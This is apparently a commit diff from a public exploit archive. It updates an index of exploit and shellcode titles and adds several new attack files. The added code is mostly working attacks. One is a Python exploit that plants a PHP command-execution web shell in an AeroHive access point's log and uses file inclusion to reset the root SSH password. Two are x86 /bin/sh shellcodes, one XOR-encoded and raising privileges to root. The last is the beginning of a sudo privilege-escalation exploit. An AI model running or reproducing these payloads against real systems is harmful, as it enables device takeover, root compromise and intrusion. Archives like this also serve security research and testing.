DB: 2017-06-16

6 new exploits Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit) Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without EggHunter) (Metasploit) VX Search Enterprise 9.7.18 - Local Buffer Overflow Sudo - 'get_process_ttyname()' Privilege Escalation Win32 - JITed stage-0 Shellcode Win32 - JITed Stage-0 Shellcode Windows - JITed egg-hunter stage-0 Shellcode Windows - JITed Egghunter Stage-0 Shellcode Windows XP/Vista/7 - JITed egg-hunter stage-0 Shellcode Adjusted Universal Windows XP/Vista/7 - JITed Egghunter Stage-0 Shellcode Adjusted Universal Linux/x86 - Egg-hunter Shellcode (31 bytes) Linux/x86 - Egghunter Shellcode (31 bytes) Linux/x86 - Egg-hunter Shellcode (20 bytes) Linux/x86 - Egghunter Shellcode (20 bytes) Linux/x86 - Egg-hunter Shellcode (13 bytes) Linux/x86 - Egghunter Shellcode (13 bytes) Linux/x86 - Egg-hunter Shellcode (18 bytes) Linux/x86 - Egghunter Shellcode (18 bytes) Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes) Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes) AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit) AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit) Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution
2017-06-16 05:01:26 +00:00 · 2017-06-16 05:01:26 +00:00 · a090330e55
commit a090330e55
parent f7178c7641
12 changed files with 501 additions and 33 deletions
--- a/files.csv
+++ b/files.csv
@ -5543,6 +5543,7 @@ id,file,description,date,author,platform,type,port
 42169,platforms/android/dos/42169.txt,"LG MRA58K - Out-of-Bounds Heap Read in CAVIFileParser::Destroy Resulting in Invalid Free",2017-06-13,"Google Security Research",android,dos,0
 42170,platforms/android/dos/42170.txt,"LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing",2017-06-13,"Google Security Research",android,dos,0
 42171,platforms/android/dos/42171.txt,"LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking",2017-06-13,"Google Security Research",android,dos,0
 42182,platforms/windows/dos/42182.cpp,"Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation",2017-06-15,bee13oy,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -7005,7 +7006,7 @@ id,file,description,date,author,platform,type,port
 17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0
 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing - Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0
 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Metasploit)",2011-05-22,Metasploit,windows,local,0
-17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0
+17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without EggHunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0
 17362,platforms/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous",windows,local,0
 17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - '.mp3' File Buffer Overflow (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0
 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
@ -9053,6 +9054,8 @@ id,file,description,date,author,platform,type,port
 42161,platforms/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 42163,platforms/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local,0
 42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
 42181,platforms/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local,0
 42183,platforms/linux/local/42183.c,"Sudo - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15922,14 +15925,14 @@ id,file,description,date,author,platform,type,port
 13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0
 13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0
 13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0
-13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0
+13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0
 13636,platforms/win_x86/shellcode/13636.c,"Win32 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0
 13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0
 13642,platforms/win_x86/shellcode/13642.txt,"Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0
-13645,platforms/windows/shellcode/13645.c,"Windows - JITed egg-hunter stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
+13645,platforms/windows/shellcode/13645.c,"Windows - JITed Egghunter Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
 13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0
 13648,platforms/win_x86/shellcode/13648.rb,"Win32 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0
-13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - JITed egg-hunter stage-0 Shellcode Adjusted Universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0
+13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - JITed Egghunter Stage-0 Shellcode Adjusted Universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0
 13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - nc -lvve/bin/sh -p13377 Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0
 13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod(_/etc/shadow__ 0666) Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
 13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
@ -16055,7 +16058,7 @@ id,file,description,date,author,platform,type,port
 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell Port 4444 Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
-40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
+40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
 40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
@ -16085,7 +16088,7 @@ id,file,description,date,author,platform,type,port
 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell Port 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
-36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
+36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
 36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
 36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0
 36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0
@ -16139,7 +16142,7 @@ id,file,description,date,author,platform,type,port
 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - TCP Reverse Shell with Password Prompt Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
-39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
+39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
@ -16233,11 +16236,13 @@ id,file,description,date,author,platform,type,port
 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
 41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
 41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
-41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egg-hunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
+41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
 41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
 41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
 42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
 42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
 42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37664,7 +37669,7 @@ id,file,description,date,author,platform,type,port
 41414,platforms/hardware/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
 41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
 41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
-41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
+41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
 41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
 41428,platforms/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
 41429,platforms/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
@ -38003,3 +38008,4 @@ id,file,description,date,author,platform,type,port
 42167,platforms/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps,0
 42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0
 42173,platforms/php/webapps/42173.txt,"WordPress Plugin Event List <= 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",php,webapps,0
 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0
--- a/platforms/hardware/remote/19882.pl
+++ b/platforms/hardware/remote/19882.pl
@ -1,6 +1,7 @@
-source: http://www.securityfocus.com/bid/1154/info
+#source: http://www.securityfocus.com/bid/1154/info
-
+#
-A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash.
+#A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash.
 #
 #!/usr/bin/perl
--- a/platforms/hardware/remote/20975.pl
+++ b/platforms/hardware/remote/20975.pl
@ -1,10 +1,11 @@
-source: http://www.securityfocus.com/bid/2936/info
+# source: http://www.securityfocus.com/bid/2936/info
-
+# 
-IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
+# IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
-
+# 
-It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
+# It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
-
+# 
-This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
+# This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
 # 
 #!/usr/bin/perl
 # modified roelof's uni.pl
--- a/platforms/hardware/remote/20976.c
+++ b/platforms/hardware/remote/20976.c
@ -1,3 +1,4 @@
 /*
 source: http://www.securityfocus.com/bid/2936/info
 IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
@ -5,6 +6,7 @@ IOS is router firmware developed and distributed by Cisco Systems. IOS functions
 It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
 This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
 */
 /* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
 * to compile:
--- a/platforms/hardware/remote/20977.pl
+++ b/platforms/hardware/remote/20977.pl
@ -1,10 +1,11 @@
-source: http://www.securityfocus.com/bid/2936/info
+# source: http://www.securityfocus.com/bid/2936/info
-  
+#   
-IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
+# IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
-  
+#   
-It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
+# It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
-  
+#   
-This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
+# This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
 # 
 #!/usr/bin/perl
 #
--- a/platforms/hardware/remote/20978.pl
+++ b/platforms/hardware/remote/20978.pl
@ -1,10 +1,11 @@
-source: http://www.securityfocus.com/bid/2936/info
+# source: http://www.securityfocus.com/bid/2936/info
-   
+#    
-IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
+# IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
-   
+#    
-It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
+# It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
-   
+#    
-This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
+# This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
 # 
 #!/usr/bin/perl
--- a/platforms/hardware/webapps/42178.py
+++ b/platforms/hardware/webapps/42178.py
@ -0,0 +1,61 @@
 #!/usr/bin/python3
 # TARGET: AeroHive AP340 HiveOS < 6.1r5
 # Confirmed working on AP340 HiveOS 6.1r2
 # This program uses a local file inclusion vulnerability
 # 1. Poison the log file in /var/log/messages by injecting PHP code into the 
 #    username field of the login page
 # 2. Call the uploaded PHP shell with the LFI URL, changing the root password for SSH
 # 3. Login with SSH as root using password "password"
 import sys
 from urllib.parse import urlencode
 from urllib.request import Request, urlopen
 import urllib
 # Payload to poison the log file at /var/log/messages
 # Note if you mess up and get invalid syntax errors just reboot AP it
 # will erase/rotate the logs
 payload_inject = "<?php if(isset($_REQUEST[\'cmd\'])){     $cmd = ($_REQUEST[\"cmd\"]);     system($cmd);     echo \"</pre>$cmd<pre>\";     die; } ?>"
 # URL of the login page where we will inject our PHP command exec code so it poisons the log file
 post_url= "/login.php5?version=6.1r2"
 post_fields = {"login_auth" : "1", "miniHiveUI" : "1", "userName" : payload_inject, "password" : "1234"}
 post_fields = urllib.parse.urlencode(post_fields)
 data = post_fields.encode('ascii')
 # Payload to call the injected PHP code
 payload_lfi_url = "/action.php5?_action=get&_actionType=1&_page=../../../../../../../../../../var/log/messages%00&cmd="
 # Payload to change the root SSH user password
 payload_command = "echo+root:password+|+/usr/sbin/chpasswd"
 # Combined payload to change password using LFrI
 payload_chpasswd = payload_lfi_url+payload_command
 print("\n* * * * * AeroHive AP340 HiveOS < 6.1r2 Root Exploit * * * * *\n")
 # Get target URL from user
 print("\nPlease enter the IP address of the AeroHive AP340 ex: 192.168.1.1\n")
 wap_ip = input(">>> ")
 base_url = "http://" + wap_ip
 # Poison log file with POST to login page
 # json_data = json.dumps(post_fields).encode("utf8")
 # request = urllib.request.Request(base_url+post_url, post_fields)
 print ("Poisoning log file at /var/log/messages. . .")
 request = urllib.request.Request(base_url+post_url, data)
 json = urlopen(request).read().decode()
 # Change the command with LFI->command execution
 print("Interacting with PHP shell to change root password. . .")
 content = urllib.request.urlopen(base_url+payload_chpasswd).read()
 if "Password for " in content.decode('ascii'):
 	print("Success!")
 	print("Now try to log in with root:password via SSH!")
 else:
 	print("Exploit Failed")
--- a/platforms/lin_x86-64/shellcode/42179.c
+++ b/platforms/lin_x86-64/shellcode/42179.c
@ -0,0 +1,75 @@
 /*
 ;Category: Shellcode
 ;Title: GNU/Linux x86_64 - execve /bin/sh
 ;Author: m4n3dw0lf
 ;Github: https://github.com/m4n3dw0lf
 ;Date: 14/06/2017
 ;Architecture: Linux x86_64
 ;Tested on : #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
 ##########
 # Source #
 ##########
 section .text
  global _start
    _start:
      push rax
      xor rdx, rdx
      xor rsi, rsi
      mov rbx,'/bin//sh'
      push rbx
      push rsp
      pop rdi
      mov al, 59
      syscall
 #################################
 # Compile and execute with NASM #
 #################################
 nasm -f elf64 sh.s -o sh.o
 ld sh.o -o sh
 #########################
 # objdump --disassemble #
 #########################
 Disassembly of section .text:
 0000000000400080 <_start>:
  400080:	50                   	push   %rax
  400081:	48 31 d2             	xor    %rdx,%rdx
  400084:	48 31 f6             	xor    %rsi,%rsi
  400087:	48 bb 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rbx
  40008e:	2f 73 68 
  400091:	53                   	push   %rbx
  400092:	54                   	push   %rsp
  400093:	5f                   	pop    %rdi
  400094:	b0 3b                	mov    $0x3b,%al
  400096:	0f 05                	syscall
 ######################
 # 24 Bytes Shellcode #
 ######################
 \x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05
 ########
 # Test #
 ########
 gcc -fno-stack-protector -z execstack shell.c -o shell
 */
 #include <stdio.h>
 unsigned char shellcode[] = \
 "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
 main()
 {
    int (*ret)() = (int(*)())shellcode;
    ret();
 }
--- a/platforms/lin_x86/shellcode/42177.c
+++ b/platforms/lin_x86/shellcode/42177.c
@ -0,0 +1,76 @@
 ;Title: Linux/x86 - 66 byte - execve(/bin/sh) - setuid(0) - setgid(0) - XOR encrypted
 ;Author: nullparasite
 ;Contact: nullparasite@protonmail.ch
 ;Category: Shellcode
 ;Architecture: Linux x86
 ;Description: This shellcode, first set uid and gid to zero then call shell using execve. Also, /bin/sh defined as a XOR encrypted.
 ;Tested on: Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
 ====================================================================
 global _start
 section .text
 _start:
 jmp entrypoint ; jump immd.
 prepare:
 pop esi ; address of string -> esi
 xor eax, eax ; clear eax
 xor ecx, ecx ; ecx
 mov BYTE [esi+7], al ; terminate string, str[7] = NULL
 lea ebx, [esi] ; put address of string -> ebx
 mov DWORD [esi + 8], ebx ; replace first 4-# with string
 mov DWORD [esi + 12], eax ; replace last 4-# with NULL
 mov BYTE cl, 7 ; set counter to 7
 decode:
 xor BYTE [esi + ecx - 1], 0x3 ; s[cl-1] = s[cl-1] ^ 3
 sub cl, 1 ; dec count by 1
 jnz decode ; jump if not zero
 priv_setuid:
 xor ebx, ebx ; clear ebx, setuid(0)
 mov al, 0x17 ; setuid = 0x17
 int 0x80 ; trap
 priv_setgid:
 xor ebx, ebx ; clear ebx, setgid(0)
 mov al, 0x2e ; setgid = 0x2e
 int 0x80 ; trap
 shell:
 mov BYTE al, 0x0b ; execve = 0x0b
 mov ebx, esi ; arg1, /bin/sh
 lea ecx, [esi + 8] ; arg2, p[0] = /bin/sh, p[1] = NULL
 lea edx, [esi + 12] ; arg3, pointer to NULL
 int 0x80 ; trap
 entrypoint:
 call prepare ; call prepare
 db ',ajm,pk#########' ; store string on the stack
 ====================================================================
 # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
 #include<stdio.h>
 unsigned char code[] = "\xeb\x34\x5e\x31\xc0\x31\xc9\x88\x46\x07\x8d"
 "\x1e\x89\x5e\x08\x89\x46\x0c\xb1\x07\x80\x74"
 "\x0e\xff\x03\x80\xe9\x01\x75\xf6\x31\xdb\xb0"
 "\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8"
 "\xc7\xff\xff\xff\x2c\x61\x6a\x6d\x2c\x70\x6b";
 typedef int(*shellcode_t)();
 int main(){
 shellcode_t ret = (shellcode_t)code;
 ret();
 }
 ====================================================================
--- a/platforms/linux/local/42183.c
+++ b/platforms/linux/local/42183.c
@ -0,0 +1,151 @@
 /*
 * E-DB Note: http://www.openwall.com/lists/oss-security/2017/05/30/16
 * E-DB Note: http://seclists.org/oss-sec/2017/q2/470
 * 
 * Linux_sudo_CVE-2017-1000367.c
 * Copyright (C) 2017 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */
 #define _GNU_SOURCE
 #include <dirent.h>
 #include <errno.h>
 #include <fcntl.h>
 #include <limits.h>
 #include <paths.h>
 #include <pty.h>
 #include <sched.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys/inotify.h>
 #include <sys/resource.h>
 #include <sys/stat.h>
 #include <sys/time.h>
 #include <sys/types.h>
 #include <sys/wait.h>
 #include <unistd.h>
 #define SUDO_BINARY "/usr/bin/sudo"
 #define TARGET_FILE "/etc/init.d/README"
 #define SELINUX_ROLE "unconfined_r"
 #define WORKING_DIR "/dev/shm/_tmp"
 #define TTY_SYMLINK WORKING_DIR "/_tty"
 #define TTY_SYMLINK_ TTY_SYMLINK "_"
 #define die() do { \
